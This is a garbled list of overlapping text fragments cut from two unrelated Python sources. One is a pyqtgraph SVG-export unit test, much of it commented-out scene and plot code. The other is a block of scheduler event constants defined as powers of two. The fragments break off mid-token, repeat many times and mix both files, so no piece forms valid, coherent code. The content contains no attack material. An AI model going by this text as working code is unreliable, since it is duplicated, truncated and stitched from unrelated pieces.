[ "= pg.GraphicsWindow() #w.show() #p1 = w.addPlot() #p2 = w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3],", "#w.show() #p1 = w.addPlot() #p2 = w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5)", "app = pg.mkQApp() class SVGTest(test.TestCase): #def test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0)) #w", "pg.GraphicsWindow() #w.show() #p1 = w.addPlot() #p2 = w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'})", "#rect.scale(0.5, 0.5) #rect1 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations)", "pen={'color':'k', 'cosmetic':False, 'width': 0.3}) #app.processEvents() #app.processEvents() #ex = pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg')", "= pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50, 50) #rect.rotate(30)", "#grp.translate(200,0) ##grp.rotate(30) #rect2 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp)", "import pyqtgraph as pg app = pg.mkQApp() class SVGTest(test.TestCase): #def", "#scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50, 50) #rect.rotate(30) #rect.scale(0.5, 0.5) #rect1 = pg.QtGui.QGraphicsRectItem(0,", "#rect = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50, 50)", "= w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width': 0.3})", "#p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width': 0.3}) #app.processEvents() #app.processEvents()", "grp2.addItem(rect3) ex = pg.exporters.SVGExporter.SVGExporter(scene) ex.export(fileName='test.svg') if __name__ == '__main__': test.unittest.main()", "#rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30) #el = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50) #el.translate(10,-5)", "import test import pyqtgraph as pg app = pg.mkQApp() class", "#el.scale(0.5,2) #el.setParentItem(rect2) grp2 = pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100) rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2)", "pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20) #rect1.scale(2,2) #el1", "SVG export test \"\"\" import test import pyqtgraph as pg", "100) #rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20) #rect1.scale(2,2) #el1 = pg.QtGui.QGraphicsEllipseItem(0, 0,", "#rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20) #rect1.scale(2,2) #el1 = pg.QtGui.QGraphicsEllipseItem(0, 0, 100,", "0.5) #rect1 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20,", "= pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3) ex = pg.exporters.SVGExporter.SVGExporter(scene) ex.export(fileName='test.svg') if", "#el = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50) #el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2) grp2", "\"\"\" SVG export test \"\"\" import test import pyqtgraph as", "'cosmetic':False, 'width': 0.3}) #app.processEvents() #app.processEvents() #ex = 
pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def", "#rect1.setPos(20, 20) #rect1.scale(2,2) #el1 = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100) #el1.setParentItem(rect1)", "#rect1.scale(2,2) #el1 = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100) #el1.setParentItem(rect1) ##grp =", "def test_simple(self): scene = pg.QtGui.QGraphicsScene() #rect = pg.QtGui.QGraphicsRectItem(0, 0, 100,", "20) #rect1.scale(2,2) #el1 = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100) #el1.setParentItem(rect1) ##grp", "100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30) #el = pg.QtGui.QGraphicsEllipseItem(0, 0,", "#rect1 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20)", "grp2.scale(100,100) rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3) ex = pg.exporters.SVGExporter.SVGExporter(scene)", "100, 100) #el1.setParentItem(rect1) ##grp = pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30) #rect2", "#rect2.rotate(30) #el = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50) #el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2)", "100, 50) #el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2) grp2 = pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100)", "= pg.QtGui.QGraphicsScene() #rect = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #scene.addItem(rect) #rect.setPos(20,20)", "pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def test_simple(self): scene = pg.QtGui.QGraphicsScene() #rect = pg.QtGui.QGraphicsRectItem(0,", "#w = pg.GraphicsWindow() #w.show() #p1 = w.addPlot() #p2 = w.addPlot()", "scene.addItem(grp2) grp2.scale(100,100) rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3) ex =", "#app.processEvents() #ex = pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def test_simple(self): scene = pg.QtGui.QGraphicsScene()", "25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30) #el = pg.QtGui.QGraphicsEllipseItem(0, 0, 100,", "test import pyqtgraph as pg app = pg.mkQApp() class SVGTest(test.TestCase):", "#el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2) grp2 = pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100) rect3 =", "= pg.mkQApp() class SVGTest(test.TestCase): #def test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0)) #w =", "pg.QtGui.QGraphicsScene() #rect = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50,", "SVGTest(test.TestCase): #def test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0)) #w = pg.GraphicsWindow() #w.show() #p1", "#grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30) #rect2 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape)", "#p1 = w.addPlot() #p2 = w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3],", "0.3}) #app.processEvents() #app.processEvents() #ex = pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def test_simple(self): scene", "scene = pg.QtGui.QGraphicsScene() #rect = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #scene.addItem(rect)", 
"#rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30) #el = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50)", "#el1.setParentItem(rect1) ##grp = pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30) #rect2 = pg.QtGui.QGraphicsRectItem(0,", "= pg.QtGui.QGraphicsRectItem(0, 0, 100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30) #el", "50) #rect.rotate(30) #rect.scale(0.5, 0.5) #rect1 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100)", "as pg app = pg.mkQApp() class SVGTest(test.TestCase): #def test_plotscene(self): #pg.setConfigOption('foreground',", "(0,0,0)) #w = pg.GraphicsWindow() #w.show() #p1 = w.addPlot() #p2 =", "\"\"\" import test import pyqtgraph as pg app = pg.mkQApp()", "= pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50) #el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2) grp2 =", "= pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20) #rect1.scale(2,2)", "#p2 = w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width':", "0, 100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30) #el = pg.QtGui.QGraphicsEllipseItem(0,", "test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0)) #w = pg.GraphicsWindow() #w.show() #p1 = w.addPlot()", "pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30) #rect2 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 25)", "rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3) ex = pg.exporters.SVGExporter.SVGExporter(scene) ex.export(fileName='test.svg')", "100, 100) #scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50, 50) #rect.rotate(30) #rect.scale(0.5, 0.5) #rect1", "pg app = pg.mkQApp() class SVGTest(test.TestCase): #def test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0))", "#p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width': 0.3}) #app.processEvents() #app.processEvents() #ex =", "0, 100, 100) #el1.setParentItem(rect1) ##grp = pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30)", "50) #el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2) grp2 = pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100) rect3", "pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3) ex = pg.exporters.SVGExporter.SVGExporter(scene) ex.export(fileName='test.svg') if __name__", "class SVGTest(test.TestCase): #def test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0)) #w = pg.GraphicsWindow() #w.show()", "w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width': 0.3}) #app.processEvents()", "grp2 = pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100) rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False))", "#el1 = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100) #el1.setParentItem(rect1) ##grp = pg.ItemGroup()", "= pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30) #rect2 = pg.QtGui.QGraphicsRectItem(0, 0, 100,", "#rect.rotate(30) #rect.scale(0.5, 0.5) 
#rect1 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #rect1.setParentItem(rect)", "pg.QtGui.QGraphicsRectItem(0, 0, 100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30) #el =", "#p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width': 0.3}) #app.processEvents() #app.processEvents() #ex = pg.exporters.SVGExporter.SVGExporter(w.scene())", "#rect2 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30)", "#ex.export(fileName='test.svg') def test_simple(self): scene = pg.QtGui.QGraphicsScene() #rect = pg.QtGui.QGraphicsRectItem(0, 0,", "#pg.setConfigOption('foreground', (0,0,0)) #w = pg.GraphicsWindow() #w.show() #p1 = w.addPlot() #p2", "= pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def test_simple(self): scene = pg.QtGui.QGraphicsScene() #rect =", "#app.processEvents() #app.processEvents() #ex = pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def test_simple(self): scene =", "pyqtgraph as pg app = pg.mkQApp() class SVGTest(test.TestCase): #def test_plotscene(self):", "pg.mkQApp() class SVGTest(test.TestCase): #def test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0)) #w = pg.GraphicsWindow()", "pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50) #el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2) grp2 = pg.ItemGroup()", "test_simple(self): scene = pg.QtGui.QGraphicsScene() #rect = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100)", "pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100) #el1.setParentItem(rect1) ##grp = pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0)", "100) #el1.setParentItem(rect1) ##grp = pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30) #rect2 =", "w.addPlot() #p2 = w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False,", "#ex = pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def test_simple(self): scene = pg.QtGui.QGraphicsScene() #rect", "export test \"\"\" import test import pyqtgraph as pg app", "0, 100, 50) #el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2) grp2 = pg.ItemGroup() scene.addItem(grp2)", "#el.setParentItem(rect2) grp2 = pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100) rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1,", "0, 100, 100) #rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20) #rect1.scale(2,2) #el1 =", "#rect.setPos(20,20) #rect.translate(50, 50) #rect.rotate(30) #rect.scale(0.5, 0.5) #rect1 = pg.QtGui.QGraphicsRectItem(0, 0,", "rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3) ex = pg.exporters.SVGExporter.SVGExporter(scene) ex.export(fileName='test.svg') if __name__ ==", "#rect2.setPos(0,25) #rect2.rotate(30) #el = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50) #el.translate(10,-5) #el.scale(0.5,2)", "#def test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0)) #w = pg.GraphicsWindow() #w.show() #p1 =", "100, 100) #rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20) #rect1.scale(2,2) #el1 = pg.QtGui.QGraphicsEllipseItem(0,", "100) #scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50, 50) #rect.rotate(30) #rect.scale(0.5, 0.5) #rect1 =", 
"##grp.rotate(30) #rect2 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25)", "= pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100) rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3)", "cosmetic=False)) grp2.addItem(rect3) ex = pg.exporters.SVGExporter.SVGExporter(scene) ex.export(fileName='test.svg') if __name__ == '__main__':", "= w.addPlot() #p2 = w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k',", "pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50, 50) #rect.rotate(30) #rect.scale(0.5,", "#rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20) #rect1.scale(2,2) #el1 = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100)", "0, 100, 100) #scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50, 50) #rect.rotate(30) #rect.scale(0.5, 0.5)", "= pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100) #el1.setParentItem(rect1) ##grp = pg.ItemGroup() #grp.setParentItem(rect)", "pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100) rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3) ex", "'width': 0.3}) #app.processEvents() #app.processEvents() #ex = pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def test_simple(self):", "##grp = pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30) #rect2 = pg.QtGui.QGraphicsRectItem(0, 0,", "test \"\"\" import test import pyqtgraph as pg app =", "#rect.translate(50, 50) #rect.rotate(30) #rect.scale(0.5, 0.5) #rect1 = pg.QtGui.QGraphicsRectItem(0, 0, 100,", "pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width': 0.3}) #app.processEvents() #app.processEvents() #ex" ]
[ "2 ** 2 EVENT_SCHEDULER_RESUMED = 2 ** 3 EVENT_EXECUTOR_ADDED =", "EVENT_JOB_ADDED = 2 ** 9 EVENT_JOB_REMOVED = 2 ** 10", "EVENT_JOB_ERROR = 2 ** 13 EVENT_JOB_MISSED = 2 ** 14", "EVENT_SCHEDULER_RESUMED = 2 ** 3 EVENT_EXECUTOR_ADDED = 2 ** 4", "** 5 EVENT_JOBSTORE_ADDED = 2 ** 6 EVENT_JOBSTORE_REMOVED = 2", "3 EVENT_EXECUTOR_ADDED = 2 ** 4 EVENT_EXECUTOR_REMOVED = 2 **", "** 3 EVENT_EXECUTOR_ADDED = 2 ** 4 EVENT_EXECUTOR_REMOVED = 2", "2 ** 4 EVENT_EXECUTOR_REMOVED = 2 ** 5 EVENT_JOBSTORE_ADDED =", "(EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED |", "2 ** 5 EVENT_JOBSTORE_ADDED = 2 ** 6 EVENT_JOBSTORE_REMOVED =", "| EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED", "| EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED", "9 EVENT_JOB_REMOVED = 2 ** 10 EVENT_JOB_MODIFIED = 2 **", "EVENT_EXECUTOR_ADDED = 2 ** 4 EVENT_EXECUTOR_REMOVED = 2 ** 5", "2 ** 12 EVENT_JOB_ERROR = 2 ** 13 EVENT_JOB_MISSED =", "= 2 ** 12 EVENT_JOB_ERROR = 2 ** 13 EVENT_JOB_MISSED", "| EVENT_JOB_ADDED | EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED | EVENT_JOB_ERROR", "= 2 ** 13 EVENT_JOB_MISSED = 2 ** 14 EVENT_JOB_SUBMITTED", "2 EVENT_SCHEDULER_RESUMED = 2 ** 3 EVENT_EXECUTOR_ADDED = 2 **", "= 2 ** 15 EVENT_JOB_MAX_INSTANCES = 2 ** 16 EVENT_ALL", "** 4 EVENT_EXECUTOR_REMOVED = 2 ** 5 EVENT_JOBSTORE_ADDED = 2", "EVENT_ALL_JOBS_REMOVED = 2 ** 8 EVENT_JOB_ADDED = 2 ** 9", "** 16 EVENT_ALL = (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED |", "** 6 EVENT_JOBSTORE_REMOVED = 2 ** 7 EVENT_ALL_JOBS_REMOVED = 2", "EVENT_SCHEDULER_SHUTDOWN = 2 ** 1 EVENT_SCHEDULER_PAUSED = 2 ** 2", "EVENT_JOBSTORE_REMOVED = 2 ** 7 EVENT_ALL_JOBS_REMOVED = 2 ** 8", "2 ** 3 EVENT_EXECUTOR_ADDED = 2 ** 4 EVENT_EXECUTOR_REMOVED =", "1 EVENT_SCHEDULER_PAUSED = 2 ** 2 EVENT_SCHEDULER_RESUMED = 2 **", "= 2 ** 5 EVENT_JOBSTORE_ADDED = 2 ** 6 EVENT_JOBSTORE_REMOVED", "** 14 EVENT_JOB_SUBMITTED = 2 ** 15 EVENT_JOB_MAX_INSTANCES = 2", "EVENT_JOB_MAX_INSTANCES = 2 ** 16 EVENT_ALL = (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN", "= 2 ** 11 EVENT_JOB_EXECUTED = 2 ** 12 EVENT_JOB_ERROR", "15 EVENT_JOB_MAX_INSTANCES = 2 ** 16 EVENT_ALL = (EVENT_SCHEDULER_STARTED |", "EVENT_JOB_ADDED | EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED | EVENT_JOB_ERROR |", "16 EVENT_ALL = (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED", "EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED | EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED |", "12 EVENT_JOB_ERROR = 2 ** 13 EVENT_JOB_MISSED = 2 **", "2 ** 11 EVENT_JOB_EXECUTED = 2 ** 12 EVENT_JOB_ERROR =", "** 0 EVENT_SCHEDULER_SHUTDOWN = 2 ** 1 EVENT_SCHEDULER_PAUSED = 2", "EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED | EVENT_JOB_REMOVED |", "2 ** 8 EVENT_JOB_ADDED = 2 ** 9 EVENT_JOB_REMOVED =", "EVENT_SCHEDULER_START = 2 ** 0 EVENT_SCHEDULER_SHUTDOWN = 2 ** 1", "EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED |", "= 2 ** 0 EVENT_SCHEDULER_SHUTDOWN = 2 ** 1 EVENT_SCHEDULER_PAUSED", "= 2 ** 16 EVENT_ALL = (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN |", "** 12 EVENT_JOB_ERROR = 2 ** 13 EVENT_JOB_MISSED = 2", "EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED | 
EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED |", "11 EVENT_JOB_EXECUTED = 2 ** 12 EVENT_JOB_ERROR = 2 **", "EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED |", "| EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED", "= EVENT_SCHEDULER_START = 2 ** 0 EVENT_SCHEDULER_SHUTDOWN = 2 **", "** 10 EVENT_JOB_MODIFIED = 2 ** 11 EVENT_JOB_EXECUTED = 2", "= 2 ** 3 EVENT_EXECUTOR_ADDED = 2 ** 4 EVENT_EXECUTOR_REMOVED", "10 EVENT_JOB_MODIFIED = 2 ** 11 EVENT_JOB_EXECUTED = 2 **", "EVENT_JOB_SUBMITTED = 2 ** 15 EVENT_JOB_MAX_INSTANCES = 2 ** 16", "EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED | EVENT_JOB_ERROR | EVENT_JOB_MISSED |", "EVENT_JOB_MODIFIED = 2 ** 11 EVENT_JOB_EXECUTED = 2 ** 12", "EVENT_EXECUTOR_REMOVED = 2 ** 5 EVENT_JOBSTORE_ADDED = 2 ** 6", "= 2 ** 14 EVENT_JOB_SUBMITTED = 2 ** 15 EVENT_JOB_MAX_INSTANCES", "** 15 EVENT_JOB_MAX_INSTANCES = 2 ** 16 EVENT_ALL = (EVENT_SCHEDULER_STARTED", "** 7 EVENT_ALL_JOBS_REMOVED = 2 ** 8 EVENT_JOB_ADDED = 2", "2 ** 14 EVENT_JOB_SUBMITTED = 2 ** 15 EVENT_JOB_MAX_INSTANCES =", "2 ** 7 EVENT_ALL_JOBS_REMOVED = 2 ** 8 EVENT_JOB_ADDED =", "= 2 ** 10 EVENT_JOB_MODIFIED = 2 ** 11 EVENT_JOB_EXECUTED", "** 9 EVENT_JOB_REMOVED = 2 ** 10 EVENT_JOB_MODIFIED = 2", "| EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED", "<gh_stars>10-100 EVENT_SCHEDULER_STARTED = EVENT_SCHEDULER_START = 2 ** 0 EVENT_SCHEDULER_SHUTDOWN =", "0 EVENT_SCHEDULER_SHUTDOWN = 2 ** 1 EVENT_SCHEDULER_PAUSED = 2 **", "14 EVENT_JOB_SUBMITTED = 2 ** 15 EVENT_JOB_MAX_INSTANCES = 2 **", "| EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED | EVENT_JOB_REMOVED", "** 2 EVENT_SCHEDULER_RESUMED = 2 ** 3 EVENT_EXECUTOR_ADDED = 2", "= 2 ** 9 EVENT_JOB_REMOVED = 2 ** 10 EVENT_JOB_MODIFIED", "** 1 EVENT_SCHEDULER_PAUSED = 2 ** 2 EVENT_SCHEDULER_RESUMED = 2", "EVENT_SCHEDULER_STARTED = EVENT_SCHEDULER_START = 2 ** 0 EVENT_SCHEDULER_SHUTDOWN = 2", "2 ** 9 EVENT_JOB_REMOVED = 2 ** 10 EVENT_JOB_MODIFIED =", "** 8 EVENT_JOB_ADDED = 2 ** 9 EVENT_JOB_REMOVED = 2", "EVENT_JOB_REMOVED = 2 ** 10 EVENT_JOB_MODIFIED = 2 ** 11", "2 ** 10 EVENT_JOB_MODIFIED = 2 ** 11 EVENT_JOB_EXECUTED =", "2 ** 6 EVENT_JOBSTORE_REMOVED = 2 ** 7 EVENT_ALL_JOBS_REMOVED =", "EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED | EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED |", "2 ** 16 EVENT_ALL = (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED", "| EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED | EVENT_JOB_ERROR | EVENT_JOB_MISSED | EVENT_JOB_SUBMITTED", "= 2 ** 1 EVENT_SCHEDULER_PAUSED = 2 ** 2 EVENT_SCHEDULER_RESUMED", "** 13 EVENT_JOB_MISSED = 2 ** 14 EVENT_JOB_SUBMITTED = 2", "2 ** 15 EVENT_JOB_MAX_INSTANCES = 2 ** 16 EVENT_ALL =", "= 2 ** 2 EVENT_SCHEDULER_RESUMED = 2 ** 3 EVENT_EXECUTOR_ADDED", "2 ** 1 EVENT_SCHEDULER_PAUSED = 2 ** 2 EVENT_SCHEDULER_RESUMED =", "= 2 ** 6 EVENT_JOBSTORE_REMOVED = 2 ** 7 EVENT_ALL_JOBS_REMOVED", "2 ** 0 EVENT_SCHEDULER_SHUTDOWN = 2 ** 1 